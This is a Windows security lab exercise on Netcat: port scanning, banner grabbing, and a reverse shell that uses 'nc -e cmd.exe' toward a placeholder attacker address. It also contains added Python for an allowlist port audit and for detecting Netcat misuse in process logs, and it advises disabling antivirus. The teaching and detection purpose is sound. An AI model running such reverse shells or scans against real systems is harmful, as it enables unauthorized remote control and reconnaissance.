Task 8.7: Investigating Netcat

One of the interesting things about security tools is that everybody uses them. Security tools are used by security professionals but also by hackers. One of the first security assessment tools was SATAN. While SATAN helped secure networks, it could also be used by attackers to scan networks for vulnerabilities. Our next task uses a very similar tool, Netcat. Netcat can be a useful tool for establishing remote connections.

Scenario

The organization for which you work has become more concerned about security and would like you to demonstrate the need for better security controls. You have decided to use Netcat, the Swiss Army knife of security tools, to demonstrate how remote connections are established.

Scope of Task

Duration

This task should take about 15 minutes.

Setup

For this task, you will need two Windows computers, access to the Administrator account, and an Internet connection.

Caveat

Tools such as Netcat may be flagged by some antivirus tools as malicious. You should also practice caution when downloading unknown tools. You should always check out a tool on a closed test network before deploying live.

Procedure

In this task, you will learn how to use Netcat, a security-assessment tool.

Equipment Used

For this task, you must have:

  • Two Windows computers
  • Access to the Administrator account
  • An Internet connection

Details

This task will run Netcat, a command-line security tool. It will be used to perform banner grabbing, to scan ports, and to open a remote connection.

Installing and Using Netcat

1. Once you have accessed your Windows computer and logged in as Administrator, open your browser and go to http://webscripts.softpedia.com/script/Networking-Tools/Netcat-27515.html.

This will take you to the download page of the Windows version of Netcat.


If you would like more details from the creator, you can find their site at http://netcat.sourceforge.net/.

2. Choose the Download link to start the download.

3. When the download finishes, place the tool into the path so that when you open a command prompt the program can be easily found.


If your virus scanner complains about running Netcat, you will need to disable it for the duration of this task.

4. Before starting the scanning process, take a moment to review some common Netcat switches. Start your Windows computer and open a command prompt by choosing Start ⇒ Run and entering cmd. Type nc -h at the command line to review Netcat options. The response will look similar to the following:

connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]

Port Scanning with Netcat

1. Netcat can be used as a simple port scanner; to do so, enter the following at the command line: nc -v -w 2 -z IP_address 21-110.

2. Replace IP_address with the IP address of the second Windows computer.

3. The previous command asks Netcat to attempt a connection to every port from 21 through 110 at the targeted IP address. This tells you the status of the ports used by services such as FTP, Telnet, DNS, and POP3.

4. These are the ports that attackers typically target. Notice the results obtained when we ran the tool:

C:\temp>nc -v -w 2 -z 192.168.123.254 21-110
192.168.123.254: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.123.20] 21 (ftp) open
(UNKNOWN) [192.168.123.20] 53 (dns) open
(UNKNOWN) [192.168.123.20] 80 (http) open

5. What were the results? Were you able to identify any open ports? If so, you will want to investigate why these ports are open and if these services are actually needed.


Practicing the principle of “deny all” is one of the most important things a security professional can do.
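The scan above reports which ports answered; the "deny all" question is which of those should be answering at all. The following added example (not part of the original task, not Netcat's own code) does the same TCP connect scan that nc -v -w 2 -z performs and then compares the result with an allowlist of services the organization has actually approved. The target address and the allowlist are placeholders you supply.

```python
import socket

# Service names for the ports this task discusses (a constructed lookup, not nc's own table).
SERVICE_NAMES = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 80: "http", 110: "pop3"}


def scan_ports(host, ports, timeout=2.0):
    """TCP connect scan, the equivalent of 'nc -v -w <timeout> -z host ports'.
    -z means connect only, send nothing; returns the ports that completed the handshake."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)  # -w 2: give up on a port after the timeout
            if s.connect_ex((host, port)) == 0:  # 0 means the connection succeeded
                open_ports.append(port)
    return open_ports


def unexpected_services(open_ports, allowed_ports):
    """Apply 'deny all': anything listening that is not on the allowlist needs a justification."""
    return [(p, SERVICE_NAMES.get(p, "unknown"))
            for p in sorted(open_ports) if p not in allowed_ports]


def audit(host, first_port, last_port, allowed_ports, timeout=2.0):
    """Scan a port range the way step 1 does and report what the allowlist does not cover."""
    found = scan_ports(host, range(first_port, last_port + 1), timeout)
    return {"open": found, "unexpected": unexpected_services(found, allowed_ports)}


if __name__ == "__main__":
    # Placeholder target: replace with the address of the second Windows computer.
    # Here only HTTP on port 80 is assumed to be an approved service.
    result = audit("192.168.123.20", 21, 110, allowed_ports={80})
    for port, name in result["unexpected"]:
        print(f"port {port} ({name}) is open but not on the allowlist; investigate why")
```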

Grabbing Banners with Netcat

1. Netcat is truly a tool of many functions. This part of the task will demonstrate how to use Netcat to grab banners.

2. Use Notepad to create a text file named header.txt with the following content:

HEAD / HTTP/1.0
<ENTER>
<ENTER>

3. Run Netcat as follows, entering the IP address of the second Windows system you have running in place of IP_address: nc -v IP_address 80 < header.txt.

4. For this exercise, we ran the tool against 192.168.123.1 and the results are shown here:

Apache/2.0.48-dev (Unix)
Server at 192.168.123.1 Port 80</address>


Responses will vary depending on the version of the web server running or whether the banner has been altered. Some system administrators block the service identifier.

Using Netcat to Shovel a Shell

1. Many individuals wonder how attackers use remote systems to launch attacks. One of Netcat’s most interesting features is its ability to open a connection on a remote system. Make sure Netcat is loaded on both of your Windows computers.

The two Windows computers will be called Windows1 and Windows2. Windows1 will serve as the attacker and Windows2 will serve as the victim.

2. On Windows1, open a command prompt and enter the following command: nc -n -v -l -p 80.

This command will cause Netcat to listen on port 80 for a connection from Windows2.

3. On Windows2, open a command prompt and enter this command:

nc -n Windows1_IP_Address 80 -e "cmd.exe"

Be sure to replace Windows1_IP_Address with the IP address of Windows1.

4. Once you enter the command, return to Windows1 and observe the command prompt where Netcat is listening. If you have entered the commands successfully, you will see a standard Windows banner. Type ipconfig and confirm that the IP address is the address of Windows2.

5. At this point, you are running commands on Windows2. Had this been a real attack, this system would be in serious danger of being fully compromised.


To fully grasp the danger such tools pose, just consider that the attacker is now running their programs on your computer. For a good set of guidelines on safe security practices, review the “10 Immutable Laws of Security” at www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true.
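The command lines used in this part of the task are exactly what a defender should be looking for in process-creation logs: Netcat started with -e and a shell, or left listening with -l or -L. The following added example (not part of the original task) classifies Windows process-creation records by those switches and scores them; the log lines are constructed samples in a hypothetical host|parent|command-line layout, and NETCAT_NAMES and SHELLS are assumed lists you would extend for your environment.

```python
# Constructed sample events (not real log data): host|parent process|command line.
SAMPLE_EVENTS = [
    'Windows2|explorer.exe|nc -n 192.168.123.10 80 -e "cmd.exe"',
    "Windows1|cmd.exe|nc -n -v -l -p 80",
    "Windows2|cmd.exe|nc -v -w 2 -z 192.168.123.20 21-110",
    "Windows2|svchost.exe|nc.exe -L -p 4444 -e powershell.exe",
    "Windows3|explorer.exe|notepad.exe header.txt",
]

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe"}          # assumed image names to watch
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}  # programs that give a remote shell


def classify_netcat(cmdline):
    """Return the risky Netcat switches seen on one command line (empty list if not Netcat).
    'shell-exec' means -e hands a shell to the peer (the shovel-a-shell case), 'listener'
    means -l/-L, 'port-scan' means -z, 'detach' means -d (background mode)."""
    argv = cmdline.split()  # simple whitespace split; quoted paths with spaces are not handled
    if not argv or argv[0].lower().split("\\")[-1] not in NETCAT_NAMES:
        return []
    findings = []
    for i, arg in enumerate(argv):
        if arg == "-e" and i + 1 < len(argv):
            prog = argv[i + 1].strip('"').lower().split("\\")[-1]
            if prog in SHELLS:
                findings.append("shell-exec")
        elif arg in ("-l", "-L"):
            findings.append("listener")
        elif arg == "-z":
            findings.append("port-scan")
        elif arg == "-d":
            findings.append("detach")
    return findings


def triage(events):
    """Score each event: a shell handed to a remote peer is critical, other Netcat use is medium."""
    alerts = []
    for line in events:
        host, parent, cmdline = line.split("|", 2)
        findings = classify_netcat(cmdline)
        if not findings:
            continue
        severity = "critical" if "shell-exec" in findings else "medium"
        alerts.append({"host": host, "parent": parent, "severity": severity, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['severity']:8} {alert['host']} parent={alert['parent']} {alert['findings']}")
```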

Criteria for Completion

You have completed this task when you have run Netcat to scan ports, perform banner grabbing, and open a remote shell. You should now see how some tools can be used by both security professionals and attackers.
